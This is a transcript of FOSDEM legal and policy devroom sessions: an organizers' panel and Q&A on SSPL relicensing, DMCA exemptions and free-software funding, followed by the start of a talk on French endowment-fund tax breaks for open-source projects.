Yep, and a shout out to Deb and Hong Fook's talk for, for, for bringing the conversation global. We are a global community as free software contributors. And it's, it's important to, to learn from all of the, the work being done in different places, especially where it's successful. And I, I agree it's the US is not, is not a great example of that, which maybe is a good transition to talk about something that has happened in the last year that we didn't cover in the Dev Room Bradley. I don't know if it's makes sense to talk about just to fill people in on the DMCA stuff when we talk about how bad things are in the, in the United States or Richard, I don't know if you have any. I mean, the start of the fountain I talked about this a lot. I mean, the startup culture in the US has had some influence on FOS and not usually particularly good. I mean, do you want to, do you want to talk a little bit about what's happened in the last year with, with, with some of the startups have done with regard to licensing that's been really much in the news the last, the last year? Yeah. So I remember we, we actually talked about this in our organizers panel last year. I think it was last year and not, not the year before. And it was a major topic then. So we were seeing this trend of, you know, I want to say startups, but it's not, you know, I'm not sure it's, it's limited to what I would call startups, but smaller tech companies that have grown up around a sort of vendor controlled free software slash open source project. You know, typically using a certain type of governance model that emphasizes, you know, using a kind of asymmetrical contributor agreement, a CLA or whatever. And not really having a very, you know, a significant contributor community in part because these, these companies tend to be hostile to, to outside contributors for various reasons. And then these companies sort of a few years ago started experimenting with licensing models that resembled, you know, sort of free and open source software licenses in some respects, but deviated from them in significant ways. And you know, MongoDB and the server side public license was the first notable example of this and at least in the modern era. And that was about three or four years ago now. But we saw a number of other companies moving in this direction. And we talked about that a little bit last year. So very recently, the latest company to do something like this was Elastic. Earlier this month announced that it was going to use the server side public license. So the license that MongoDB had introduced for, for some of its projects. And so, so, you know, this, this is, you know, from my perspective, at least a pretty disturbing development. These companies have, you know, in part been sort of blurring the meaning of, you know, it's really open source, not free software. So they've been, they've been blurring the meaning of open source and sort of trying to, to push on the boundaries of the open source definition. And, you know, this, the, the, the main feature of these various licenses is sort of, you know, I would say sort of use restrictions. So kind of prohibitions on, on use cases by competitors. Essentially, you know, to a large extent, these companies are concerned about competition from, you know, cloud providers. And that's, that's kind of motivated some of these, these license changes. 
But you know, kind of more, more broadly, I think this just sort of is part of a longer theme of, of, you know, tension that's existed, you know, between sort of like free software or open source as a means of kind of building a basis for business success versus the kind of ethical goals that, that lie behind, you know, free software and, and I would say open source as well. And, and we know year after year, we continue to see interesting examples of this. And this is sort of the, the latest, I guess. And interestingly, we had a talk in our, in our Dev Room this year, you know, about this kind of proprietary licensing business model. I think when we were doing the acceptance for the talk, for the talks, I was sort of most skeptical about that because I didn't want to provide a mouthpiece to the proprietary relicensing regime that MongoDB and Elastic and other such companies are putting forward. The really nice thing, I kept an open mind about it. And I actually think it ended up, I would give that talk the best talk of the year award on our track because I think it really laid out in a very clear way how the, the, the Q, QT situation impacted the KDE project and how the KDE project by being a strong existing free software project probably, and still to this day, I think probably the largest user of QT, of anybody in, in any software space at all was able to leverage their, their community power to assure that QT remained free software and to bind the company and its successors to continue to improve the free software. It's quite a magic trick from my point of view that they were able for so long across so many owners of QT to assure that, that, that the public version of free software version of QT did not become a, you know, just a, you know, unmaintained kind of afterthought release. And that's something that I think was unique to KDE. I disagree a little bit with Cornelius's conclusion that we could do this for any of these projects because I think it was almost a artifact of its time that, that open source was not something that someone wanted to market around. I don't think any QT could go to other customers in the late 1990s and convince them to buy, to, to, you know, to buy based on it being open source, whereas MongoDB and Elastic are seeing that. The other thing that's really disturbing about the Elastic move different than the MongoDB move is they moved from a free software license to this SS public license, which is, is not a FOSS license. And it's played into this view of copy left versus anti copy left because MongoDB tried so hard to convince people the SS public license was the future of copy left as they, they put it when they began marketing it. And here we have Elastic switching from the non copy left Apache license to a, to SS public license. And so I found it very difficult as an activist and a policy person to explain the nuance of well actually the SS public license isn't a copy left license. And if it were, if there were a copy left license they switched to, it might have helped them fight Amazon in the way that they wanted to. But what they did instead is they switched to this non free license to fight Amazon. So, so I, and I have, I'm curious how that's playing out in, for my European colleagues in Europe and if folks are, folks are able to see that nuance in a way they haven't been able to here in the U S. I'm not so sure whether there's a big difference between the European view and the US review. 
It definitely troubles us as well at the FSFE that this happens. Definitely. So I think the difference here between the KDE–Qt model that Cornelius presented and Elastic is, well, Qt and KDE, they wanted to cooperate. And they were mature enough in the sense of, like, let's cooperate with each other. So they had this agreement and it has been fulfilled also by the successors, basically. So we see here a successful, fruitful cooperation, while, as Richard already said, a CLA is this asymmetric way of contribution. And so, well, this has basically laid the ground that this could happen. And I think a big topic will be how the free software contributors want to interact with companies or with organizations that might take their contributions away and make them basically proprietary. So this is a discussion to lead, and I think it's not bound to the US or to Europe specifically. But yeah, I found this maturity discussion quite interesting, a shared theme among, like, Cornelius' talk, but also in the compliance panel that you moderated, Bradley, which I found definitely interesting. And also I would quote David from Huawei when he says that, well, you can really see whether a company is mature enough if their FOSS compliance is actually a mature process and a good process that they have. And I quite like this, that, yeah, companies think in free software terms from the beginning on, and not treat this as a thoughtless afterthought, basically. And to be honest, I missed a little bit the mention of REUSE here, because I think this is a perfect example of how communities and projects can fix, clarify their licensing and their copyright from the start on. And this is a thing that can be created or worked with by organizations and individual developers, no matter which size they have or no matter the project size. And I would love to see this more, that people care from the very start on, like the Yocto project, that with every release, combined with the software, they also have properly declared the licensing and copyright of their project, because I think we still waste too much energy on fixing problems after they have been created, with tools like FOSSology, which are great and which we need, but we should put more effort into fixing those issues before they have been created. Yeah, and I guess we could tell our audience that there was an excellent talk submitted on REUSE, and our FSFE colleagues were surprised to learn that we had long ago created this rule that, unless it's a substitution talk because of somebody not showing up, we've always made it so that any organization that's kind of represented on the organizers panel can only have one talk from the organization in any given year at FOSDEM. So we did have to turn away some excellent talks from your colleagues at FSFE under that rule. So we're sorry that you were unpleasantly surprised by... No worries, I wasn't really surprised. That's fine for me, and I love that my colleague also had his chance to speak in this track, and if people are interested, I gave a similar talk in the OpenChain devroom, so just a pointer. So in the interest of the talk we weren't able to give — Karen, Conservancy had some work this year that I guess we could cover here, that we would have submitted a talk about if not for that rule, regarding our DMCA work. Do you want to talk a little bit about that, that happened this year here in the US? Sure, sure.
I was looking to transition to it a little bit before when we were talking about how much worse the laws are in the United States compared to elsewhere in the world. So it seemed like a very easy time to transition to the Digital Millennium Copyright Act in the United States which provides prohibitions on circumventing technological protection measures in order to even do lawful uses of the technology. And so there's a process every three years where folks are invited to propose exemptions to that rule and Conservancy and others have been involved on behalf of free software. Throughout we, you know, many of the organizations protest the existence of the law to begin with and then engaging in the three-year cycle allows us to propose exemptions. And so Conservancy in the past applied for and won an exemption for smart TVs and I personally participated in one for medical devices. And this year Conservancy applied for a number of new exemptions. Ones to allow us to basically allow us to circumvent so that we can see what software is running in a device so we can know if there's a GPL violation. And so basically circumvention being used in order to hide copyright infringement. So it's sort of a novel argument for the Library of Congress in the United States and I'm looking forward to see how that plays out. We've also applied for one for routers which connects back to our router freedom talk that we had earlier in the Dev Room. And we had Bradley help me out. We are the only organization that was unwise enough to file three exemption requests. And we've filed one for a small expansion of the privacy restrictions that are in. There's a privacy allowance already in the law here in the US but one of our filings looks for a kind of a small expansion of that privacy exemption that already exists. Which is not granted it's not as big of a deal because the privacy exemption in the law is already pretty broad which is fortunate. But we're trying to move that edge a little bit forward in our exemption request. And with the highlighting that if we have control over our software we're going to use it to protect our privacy. And then I personally was also involved in an expansion of the medical devices one too. And so I'm excited about that process. It's granular but by moving the needle each time we start to see real freedom. And I think that because I think that what happens in the United States on these issues does have something of a reverberating effect globally. So it's good for people to stay up to date. Yeah and as part of that process this year I did some I spent two days kind of after we filed those I went digging trying to figure out why the DMCA is such a horrible law here in the US. And it's very it's very interesting history that it is worldwide affecting because it's because it's based on a WTO act the World Copyright Act I believe it's called WCT. It turns out the US kind of unsurprisingly implemented use the existence of this to bring in lots of things that media companies which of course many of which are based here in the US wanted as far as restrictions go. So our law here in the US goes much further than say the EUCD does in Europe but it's really a worldwide problem. And the amazing thing is that this this all started back in the early 90s. And so and then the DMCA is passed in the late 90s. So this is this is some 22 years of bad policy that we've had. And many people who are probably watching our deaf room like weren't even we're children when all of this policy went into place. 
And so we've looked at really trying to educate more about why these policies exist and how bad they are, things like the DMCA, because most people have grown up with these as standards, and the chilling effects that they create have become a regular part of life, not just for free software but for all software. Yeah, in this regard, just a note, it was also quite interesting that the DMCA case around youtube-dl also had an effect on European hosters, for instance. So we had a few cases here, at least which I know personally, in Germany, where mirrors of the software also had to be taken down, and it is quite interesting that you might have bad regulation in the US but it definitely has an effect on Europe as well, as well as the other way around. Yeah, I just noticed that we still had one talk which we didn't speak about yet, which is the "give open source a tax break" talk, and perhaps, Alex, you want to talk about this a little bit, since you saw it, as I know. Yes, yes, I attended this. It was also quite interesting. I mean, it's also a general question: how can we finance free software projects? And it's not only about a tax break. Maybe it's a general and a fundamental question, how we can get money into this. One solution can be through these tax schemes they have in France, like you spend 10,000 euro and you get 66%, I think it was, back from the state, if it's for the whole community and stuff like this. So we have something similar in Germany. So I think it's a general thing. So in Europe, for example, we have Horizon 2020, a big research program. This has billions of euros, and I think a lot more money could go into free software projects. As well, we have these open tech funds and stuff like this, and discussions around funding in general. And this is something we should also think about and share some ideas and best practices. I also think it's on the government side to fund free software projects. They use free software and they should also fund it, and it's also good for our whole society, and therefore there should be funds available in order to support these projects, as we've seen now in the Corona crisis. It would be good to have some solutions in place beforehand, and yeah, so here state money could be a game changer in the future, and we should make sure that there are funds available in order to make sure that there are good free software solutions in place for other crises, but also for the normal situation as well. Yeah, there have been really interesting proposals in the United States over the years to provide tax breaks that would have real impact on the software freedom contributors in the United States — things like proposals that were designed to benefit artists that would also provide benefit for free software developers. So in the United States, if you make a donation of your code to a charity, you can deduct the cost, only the cost. So if you're an artist, for example, you can deduct the cost of the painting, like the canvas and the paints, but you can't deduct your time, and so even if you're a world-famous painter and anyone else could sell your painting for millions of dollars, you can only take a tax deduction of your materials. And so there have been proposals in the United States to change that, but none of those bills have passed.
And so it's just interesting to to hear about, you know, possibilities elsewhere and to possibly revive some of those conversations in the United States too. So hopefully so this is obviously we said the pre-recorded part of our session given that we're at the end of the FOSM schedule by now probably all the online stuff should hopefully be working without any glitches. So we're going to hopefully join you all in the online chat after this and be able to to take questions from those of you that have watched our entire Dev Room here for the virtual legal and policy panel. And from my point of view, I'd be glad to be back in Brussels next year. So hopefully all the vaccines work and COVID coronavirus is the same as the flu by the time we spend time at FOSM and Moles around again, we can only hope. Yeah, I want to once again thank the FOSM organizers. It's so much work to put on a conference like this and they just did so much more work to make sure that nobody had to use proprietary software and that's so awesome. And I'm sorry we're not in person where we can't stand up and applaud them and also thank them in the hallway. And yeah, so, you know, I just wanted to mention that and then also we're also happy in the past we've had this time to hear about feedback from you all in terms of what you'd like to see in the future and play ways that we can improve the legal and policy Dev Room. And so we'd like to address questions first and then feedback. But if for some reason we don't have the live Q&A, feel free to contact us and give us that feedback. Bradley, do you want to tell them all what they should do in the room? I, we don't know all the details at the time of recording, but there's probably stuff on the FOSM website and show you how to talk to us next as we wrap up here. So by the time they see this. I was joking. I was joking. I was the normally say clean the room. Oh, right. Yeah, yeah, that's true. People don't have to pick up there. If there's any trash you left behind, it's in your own house, your own home right now. So usually we have to clean up the venue. So clean up your house now. Yeah, like, yeah, okay. Everybody go clean your house and make sure that it's ready immediately. The next group when they come in on Monday. All right. Well, thanks everybody. Thanks for watching. Thanks to my co organizers for another FOSM. Thank you. Bye. We'll do Q&A now. I think you should get started. Wow. So we have made it to the end of FOSM 2021. This is the last session of our legal and policy dev room. I want to thank the audience for sticking with us and being here for this whole day. We've still got some time though. So we organizers are here to answer all the questions that you might have. And yeah, so I'm going to just start going through the questions in the channel. Again, by how they were upvoted. So we'll start with the first one, which is from Krishna, which is what did you miss most about the physical FOSM and what was the positive aspect of the online event for you personally? So I missed waffles and I made the waffle recipe as recommended. I was told by my co-panelists that I should not bring the batter out to show it on camera. I did not have time to make the waffle before, but as soon as this is over, I'm going to make the faster maffles, which they won't be as good. Yeah, I don't miss that my feet don't hurt. That's great. Awesome. I missed the hallway experience, definitely. 
So the chatter, but I have to say, I have to admit, I'm really impressed by how this has been pulled off by FOSM, how the experience came across the talks and the discussions afterwards. So really good work. Yeah. I think also all these social parts and the social events beside the FOSM itself, this is what I'm missing. I'm missing Brussels. Yeah, but Max just said, great. Thank you to the organizers of this virtual FOSM here. It went very, very well. It was quite a lot of fun. And yeah, thanks a lot. It made so much fun. And I want to put a really fine point on the fact that we were talking a lot in our pre-record about the questions of conferences requiring proprietary software like Zoom. This conference was done with 100% free software. I hope you all had a good experience, but from our point of view, it was completely seamless. I mean, it's not, of course, it's not as good as a live event. But this is the best online conference I've attended. And I think it's completely unreasonable for anybody to argue they have to use proprietary software to run online events now. There was one piece of proprietary software and all this one CAPTCHA that you had to get through to make the, if you made the account on chat.fosm.org. But for that little 100 lines of code to be the only proprietary software involved in all of this, please support FOSM. I helped them launch the T-shirt. And I was the first person to buy a sweatshirt because I happened to be on IRC at like two in the morning, Europe time when they launched it. So I bought a sweatshirt. I crashed the database, but I'm getting my sweatshirt anyway. But I encourage you all to go buy the T-shirts and sweatshirts and support FOSM. They're mostly volunteers doing this to make this happen. It's been amazing. I echo that. They did an incredible job. I miss seeing them all in person. I miss seeing all of you in person. It's not the same. Although I am surprised that it was so engaging and so all-consuming that it was just like a real FOSM where I didn't have a chance to eat or drink anything the whole time. And I also missed the chocolate in addition to missing all of you. So Richard, what about you? Oh, I mean, for me, Brussels is a totally magical place this time of year, despite the weather, which is slightly better typically than the weather I'm at now in the Northeast US. But it just has a special place in my heart. I've been going to FOSM for so many years now. But the online conference is really impressive, I have to say. I'm really happy to see how well that's worked out. So the next question that was upvoted is a follow-up to this one, I think, which is to panelists from the US, how does it feel that at the end of the sessions and follow-up discussions, you still have several hours before it is getting dark? The question is the other way around. I got up at 4.30 both days. The first day, none of my alarms worked and Karen had to call me. Second day, the alarms didn't work. I would say, yeah, it's really the waking up that's the issue, not the rest of the day. It doesn't help that much. It's very weird to have FOSM and then have a day with my family. That is super strange and really lovely. And also, again, makes me miss everybody more. But it's snowing here, so it's very, very brightly light outside. And it reminds me of the year where we had this massive snowstorm at FOSM. Richard, what about you? Oh, there's so much. I'm going to use this question. Yeah, so part of the experience is actually the jet lag. 
And I'm not experiencing any of that now. I got a full night's sleep. And that's just like, it's not quite the same thing, but I can remember what it was like and kind of sort of cherish that. If you move to the West Coast, I basically have the jet lag, right? Well, it was great that the FOSM organizers would allow us to do two afternoon sessions rather than a full day session. It really made it a lot more manageable for those of us in other time zones. I didn't want to get up at 1.30. All right, so what's going to be the next topic we're going to discuss next year? Let's start with the Europeans, since they didn't get a chance to answer the previous question. Well, that's hard. I mean, we kicked the session off with the European open source strategy by the European Commission. And as they just started this, I would love to follow up on this and to see what they've done in the then last year. But also we have seen on the DMA and the router freedom, and there are so many issues we are working on. And yeah, so it's hard to predict what's the most important one. There are so many, and we've seen a lot. And most of them will be there, I guess, also next year. Yeah, I think these are the policy topics on the legal side. Also really hard to predict. I guess we share the same issues there. Perhaps another uprise, another project that goes to SSPL. But perhaps also that developers think about CLA's, this asymmetric relationship with the companies that are going into. Perhaps we will see some discussion there, I hope so. But otherwise, yeah, I think in the chat it was mentioned, the Google versus Oracle. Could be a topic, maybe, depends on the outcome. Yeah, and on the general side, the learnings from the Corona crisis. And so we also discussed it here in the pre-recorded talk a bit. And I'm pretty sure that we'll keep us busy for this year as well. Bradley, do you want to add anything since I cut you up? Yeah, I think what decides our content is a lot of times what submissions we get from all of you. And we encourage people to submit talks when the CFP opens, watch the FOSDA mailing list, which is where it's posted first. We'll try to promote it as many places as we can. But we can only do as well as the talk submissions that we get. And we're committed to making this the place where you can give a talk about an advanced topic like you saw. I love that many of the speakers had to apologize when they did something basic, like during the AGPL talk. They had to say, we're going to explain it in a minified JavaScript as we know that's too basic, but we do want to make sure we cover it. And so we want to see more advanced talks to submit them. Yeah, and let us know if you have a suggestions for topics that should be covered, even if you don't want to do the presentation. Sometimes if we feel like there's a really important topic that's not being covered, we'll put together a panel to address it. So just let us give us feedback. It's very welcome. So to get to the next question, how to make companies stop using the term free software for non-free software programs? So as I just said, we tried to challenge this with blog posts and press releases and also collected in a wiki alternatives. And I think this is what we should also continue, like creating awareness, trying to prevent people buy or get these products and run into a vendor login and creating awareness on social networks, like commenting. If they treat about it, for example, then just post another tweet and say, this is not free software. 
And so prevent people from running into this vendor login and create awareness, I think. Yeah, I find that inundating people with questions is good. Like the constant, this isn't free software. Can sometimes wear depending on who the recipient is. It's always a good idea. But sometimes just saying, like asking about whether the software provides the freedoms that we expect free software to provide. Richard, go ahead. Yeah, I mean, I think in a way that the question is ambiguous because it could be referring like specifically to the phrase free software or kind of in a broader sense, the kind of free software in the sense of free software and open source, because some people, more people use the term open source in the world to mean approximately the same thing. And a lot of the abuse we see of that set of two terms occurs on the open source side because there's actually so, I think there's so little awareness of the free software terminology. And I think that the term free software in the English sense of gratis software is maybe not as common today. Maybe that's just my own work perception. But I think this is basically a linguistic problem. And the only way you're going to solve it is through kind of a concerted effort to make people aware of what software freedom applicants see as the meaning of free software. Yeah, I mean, the term software freedom was coined a long, long ago. I've been encouraging people to switch to it as the generic term for what we do since the early 2000s. Many others have done the same. I just say, you know, say software freedom. And the other phrase I've been using a lot lately is user rights, rights of the users. And if you focus on those phrases, I think the ambiguities of the linguistic problem melt away. So the next question from JWF is what role does individual consumer awareness about privacy and open source since the pandemic began? Is there opportunity and outreach and advocacy that could be better leveraged in light of the increasing dependence and reliance on digital solutions since COVID-19? It's a tough question. Yeah, I was going to say, like, I think that, you know, to some extent, there's been like where we've been on this path for for people to understand these issues more and more and more every year. Like, I've, you know, I remember five, 10 years ago at my family functions, they all thought that I was, you know, I saw their eyes glaze over whenever I talked about how vulnerable our technology was. And they were very nice to me because they're a really nice family. But they had no idea what I was talking about, whereas that's changed over the last five to 10 years, and people seem to really understand that we are vulnerable based on the technology that we choose. And it's small steps that we're getting there. And I think that the COVID crisis has cut both ways. Like I think on some ways, people are really open to new solutions. A lot of people, for example, were using Zoom who didn't use Zoom before. So it was like an introduction of proprietary software, unfortunately, to them. But if we, for the folks I got to first, who hadn't been using video chat, they did start using Jitsie or Big Blue Button more. And so there have been a lot of opportunities. It's, you know, it's hit or miss. We have to really stay focused on making it about the next pandemic or the next crisis rather than about now, because we have to acknowledge that people are doing the best they can and that everyone is like in a really stressful situation. 
Yeah, I also thought a little bit about it. I also see this split between groups of people, like some who are really aware of these issues and receptive and others are not. I'm not so sure. I saw a lot of discussions recently about those logos, like we, I think in Europe or only in Germany, I'm not sure, these blue angel logo, so where they mark sustainable products and a colleague of mine is working to get free software for sustainable software, basically, as a requirement. Not sure whether this helps, like these simple symbols, how people can see that something is good, even if they do not fully understand why it's good, they trust in the logo or in the picture, basically, and not sure whether that's a solution. Yeah, I think that one of the things that I recommend, so my spouse who didn't regularly use Zoom, of course, is using it every day now for her work for a small nonprofit, I really encourage people to go to their community organizations and volunteer to set them up with things like Big Blue Button and Jitsie and other technologies. This is a place where direct local volunteer work can actually help. You can't see them in person because it's socially distanced, but you can call them on the phone and talk to them about it and possibly help them get set up with alternative technologies to the proprietary ones they need during the pandemic. Okay, so the next question is, where is Copy Left Conf this year? Karen, should we pre-announce? I mean, I think we may as well. Okay, so one of the things we were waiting to see how FOSDM went, because if FOSDM can organize an online event like this, we figured we could probably draft off of their technology. We are going to focus on trying to do it not all at one time. I am not a big fan of asking people to get up at weird times to go to conferences. So we're going to try to do it as a seminar series on Copy Left over the later part of this year. So that's what Copy Left 2021 will be like. And we'll announce details on sfconservancy.org when we have them, which we do not right now. It's really fun to be there all day talking about issues that we care about, like Copy Left when we're in person, but virtual conferences are just exhausting. So we're going to probably, the sessions will probably be like an hour at a time over a few weeks. Now, a question that may take all the rest of our Q&A time, which is, how is the SSPL not Copy Left? Well, I mean, so the quote I've been using, it's a common quote in various places. I don't know who sourced it. But I keep saying every tool can be used as a weapon if you hold it wrong. And I think that whether or not the SS Public License is a Copy Left is sort of not that interesting of a point. Maybe it is, maybe it isn't. But even if it is, it's an abusive manipulation of what Copy Left was supposed to do. If you design a license that specifically makes it impossible to comply with the license because you have to, don't forget, SS Public License requires that every single piece of software involved in the stack on your computer, derivative work or not, has to be under the SS Public License. And no one can actually do that in the real world. I have yet to see someone who is licensing the SS Public License, licensing outbound on it who won't take it. As my colleague on the panel here, Richard Fontana, said years ago, inbound equals outbound is the right way to design contribution mechanisms. And that's not what the SS Public License is being used for. 
So I just think it's not even worth spending as much time as we've already spent on it. Yeah, I mean, it's in one sense, it's an interesting issue of language definition. But then once you decide where you stand on it, if a Copy Left license is defined as a free software license or whatever, a Libre license or open source license that has the features of Copy Left, then if you accept the view, which I think is the consensus view now that SSPL is not a free software and open source license, then that answers the question that it can't be a Copy Left license. But beyond that, I'm not sure it's really a very interesting question that it's really the policy issues about why the license isn't a free software license is the important question to think about. Okay, so we are now at the end of our Q&A session. We're going to go into the, what's the hallway track, but the live room where you can all join us and just see if you'd like or interact with us via text, the room link will be provided in the channel. But I want to take this opportunity to thank everybody and to say, clean your room. No, I mean, to say thank you for joining and also leave it to my panelists to say anything else they might want to say. Last words. Thank you. Thanks to the first time organizers. Thanks for attending. It was great and hope to see you next year in person. Max. I can only second Alex, that has been great. Thanks to my co-panelists here and to this co-organizers has been a really good experience. But yeah, we noticed time zones matter. I hope we can do this in Brussels live.
|
The organizers of the Legal and Policy DevRoom for FOSDEM 2022 discuss together the issues they've seen over the last year in FOSS, and consider what we can learn from the presentations on the track this year, and look forward together about the future of FOSS policy.
|
10.5446/13927 (DOI)
|
Hello everyone, welcome to my presentation on giving open-source software a tax break. I think by now you should all be familiar with the format, so this is a prerecorded session and my digital version on the bottom left will guide you through the presentation, while I'm available in the chat to answer any questions you might have. Before we start, I have two sentences about myself. My name is Sven Franck, I'm German, I work for Nexedi, which is a free software publisher in the north of France, actually not so far from Brussels. I mostly work on administration and applications for European and French R&D projects, and I'm also the treasurer of the Fonds de Dotation du Libre, which applied to hold this presentation today. It's an endowment fund; I will also use the abbreviation FDL from now on because my French pronunciation is still lacking, so every time I talk about FDL, it's the Fonds de Dotation du Libre. Today's presentation will take about 20 minutes. I will first explain to you what FDL is, what a French endowment fund is. I will give you some examples of how you can use tax breaks to fund open-source software. Afterwards, I want to introduce a few examples of projects we either have completed or which we are currently working on, and I'll close with some takeaways, which for me are the points which you should take away from this presentation. So let's start. FDL, like I said, is an endowment fund created in 2018. I don't know about the specificities in other countries, but in France it's relatively easy to set up an endowment fund. You basically have to define the statutes and submit them to the prefecture for validation, and once it's validated that your endowment fund, in the way it's set up, is serving a general public interest, then you're more or less ready to go. For us, the idea behind FDL was, since at Nexedi we do quite a lot of government-sponsored R&D projects, we wanted to replicate this procedure of applying for R&D budgets and projects within FDL. This means we require a dossier for every project which is to be undertaken, and we have an expert committee, currently with three panel members, who evaluate proposals and who on the one hand have to assure that it's serving general public interest and on the other hand that it's a project they would recommend the FDL to finance. Once this is done and it is financed, projects will... no, the other way around. First I want to talk about the tax exemption. So the fonds de dotation, or endowment funds in general, finance themselves through donations. In France, there are two levels of donations, one at 60% and one at 66%, one for corporations and one for individuals. I have some details on every slide; if you scroll down, we'll either provide links, like in this case, or some more explanations. Like I said, there are two versions, or two different rates: corporations can reclaim up to 60% of donations, up to 2 million euros, or it's capped at half a percent of the annual turnover. So if you're a company and you're making one million of turnover, you have a cap of 5,000 euro, which means you can make a donation of 5,000 euro and claim back 60% from taxes you will have to pay in the future. So that is 3,000 euro. For individuals, the percentage is 66% and the maximum is 20% of your taxable income. So also an example: if you have 40,000 euro taxable income, you can donate 8,000 euro per year and recover 66% of it from taxes you have to pay.
So a donation of 2,000 euro would mean you could have a tax exemption of 1,320 euro. To give you two examples of how this works: imagine you have a company and you donate 10,000 euro to FDL; you can claim back 6,000 euro at the end of the year on the taxes you will have to pay. And FDL on the other side would receive project proposals to finance the development of certain open source software, or similar proposals. Let's say it's a software project in this case and some features had to be developed. So we would run this project proposal by our committee, who have to evaluate it, like I said earlier, and if they agree and approve, then it's a project FDL will undertake. So eventually they will pay the developer 10,000 euro for adding, in this case, features 1, 2, 3 to the software. A variation to this is if you also utilize what is called in France the crédit d'impôt recherche. It's also a reimbursement on taxes you have to pay for R&D activities — well, for research activities, not development. So if I do the same example, a company would donate 7,000 euro to FDL and could claim back 4,200 euro at year's end. At the same time, a project proposal which now doesn't have development but research items — which is a research project more than a development project — would also qualify for the crédit d'impôt recherche, which means you could still finance a project worth 10,000 euro, and in this case FDL would pay 7,000 euro to the developer and the developer could claim back 3,000 euro for his research activities from the taxes he will have to pay. So same result: you can finance projects of up to 10,000 euro doing it like this. Next I want to talk about actual projects where we applied both of the approaches. I will start with an easy one which is similar to the first example I showed; it's JXR, it's open source software. If you don't know, JXR is an online JavaScript spreadsheet editor. It's developed by a single developer in the UK called Moza Nova, and FDL financed the development of a new release of his software, which was published in April of 2020, and for us it was actually the first project we undertook, a project where we also wanted to check whether the process we had set up was working as we intended it to. So after we were approached regarding sponsoring the development of a specific feature set in JXR, and after we got into contact with Moza Nova, we developed a dossier together, had it validated by our committee, and then made a contract for the development of the features. And like I said, once it was published in April 2020, we paid — it was also 10,000 euro — and the project was completed. If we look at the second project, which is currently ongoing, it's in the open hardware area; we currently call it the open radio system. It's not software development; we are actually, with FDL, acquiring the technology of a remote radio head. An RRH, if you don't know what it is — of course it's the box in the picture. It's a device which you can use to extend the range of telecommunication networks. So imagine you want to have cell phone service in a subway tunnel. This is a box you would put there, which doesn't have a lot of range, but it can transmit a signal, either 4G, LTE or 5G, in the white spots of your network which are hard to access. And the objective of acquiring the technology is to afterwards publish the PCB design files and bill of materials under an open source license.
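To make the arithmetic of the two financing scenarios above easier to follow, here is a minimal sketch in Python. The rates and caps (a 60% corporate deduction with the donation capped at 0.5% of annual turnover or 2 million euro, and a 66% individual deduction capped at 20% of taxable income) are as stated in the talk; the function names, the turnover figure in the first example, and the 30% crédit d'impôt recherche rate implied by the worked example (3,000 euro back on a 10,000 euro research project) are illustrative assumptions, not part of the original presentation.

```python
# Minimal sketch of the donation / tax-break arithmetic described above.
# Rates and caps as stated in the talk; helper names and the 30% CIR rate
# used below are illustrative assumptions.

def corporate_deduction(donation_eur: float, annual_turnover_eur: float) -> float:
    """60% of the donation is deductible; the donation counted is capped at
    0.5% of annual turnover or 2,000,000 EUR, whichever is lower."""
    cap = min(0.005 * annual_turnover_eur, 2_000_000)
    return 0.60 * min(donation_eur, cap)

def individual_deduction(donation_eur: float, taxable_income_eur: float) -> float:
    """66% of the donation is deductible; the donation counted is capped at
    20% of taxable income."""
    cap = 0.20 * taxable_income_eur
    return 0.66 * min(donation_eur, cap)

# Example 1 from the talk: a company donates 10,000 EUR.
# (Turnover of 2,000,000 EUR is assumed here just so the cap is not binding.)
print(corporate_deduction(10_000, 2_000_000))    # -> 6000.0 EUR claimed back

# Example 2 from the talk: a 7,000 EUR donation combined with the research
# tax credit, assumed at the 30% rate implied by the example.
donation = 7_000
project_budget = 10_000
company_refund = corporate_deduction(donation, 2_000_000)   # 4200.0 EUR
developer_cir = 0.30 * project_budget                       # 3000.0 EUR
print(company_refund, developer_cir)

# Example 3 from the talk: an individual with 40,000 EUR taxable income
# donating 2,000 EUR.
print(individual_deduction(2_000, 40_000))       # -> 1320.0 EUR claimed back
```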
So some more info: the whole idea came about when we were approached last year by a small telco provider who was closing down, to ask if we were interested in acquiring the technological assets, which included the remote radio head. At Nexedi we were involved in an R&D project four years ago whose topic was to create an open source telecommunications provider, trying to research whether it was possible, only with open source components, to do everything you need to do to become a telco provider. In that project we already saw back then that there not being an open source remote radio head was a blocker, and, yeah, back then we didn't have any solutions. So for us it was interesting, once it was proposed to us to acquire the technological assets, to say: we could do this and we could publish the PCB design and BOM (bill of materials) under an open source license. So everyone who is in the field of software defined radio, signal processing and open source radio would have the missing component for building a complete solution. So, long story short, we started to look for funding to do an acquisition, and the current status is that we finalized an acquisition contract, it has been signed, and we're in the process of transferring the technological assets and trying to validate whether, A, it's complete and, B, whether it is sufficient to reproduce the technology, for us and also, in the next step, for any third person who wants to use what we would publish once the project is over. The next project is a complement to the open source and open hardware projects I talked about just before. It's open service, or what we currently call the Hyper Open initiative. It's an initiative created by FDL in the cloud area, and we already have two cloud providers trying to implement the idea. The whole thing came about because, as you all know, interoperability in the cloud is currently a topic much discussed, with initiatives such as Gaia-X, and reversibility is just as important. We thought: imagine you're using open software and open hardware, but if a service is not open, you can never completely reproduce a cloud solution or a cloud service. So our idea was to create an initiative to try and establish open service as an equal part next to open source software and open hardware, and to apply the four freedoms of free software to the service industry. So open service means that a service has to be usable, you have to be able to study how it's made, you have to be able to modify it and you have to be able to become your own provider of that service. In the cloud, for us, this means there must be transparency about which suppliers, which components and which procedures are used. And, basically, to formalize this into something which interested cloud providers could cooperate with us on, we said: let's create an initiative, which we call the Hyper Open initiative. The current status: as I said earlier, we already have two cloud providers who are interested in implementing it, and for us this means there are two companies with whom we are working together to look at how this can actually be done, what needs to be documented to make a service reproducible. We are working on documentation quite a lot, and in parallel we are trying to create the underlying association and structure for this initiative.
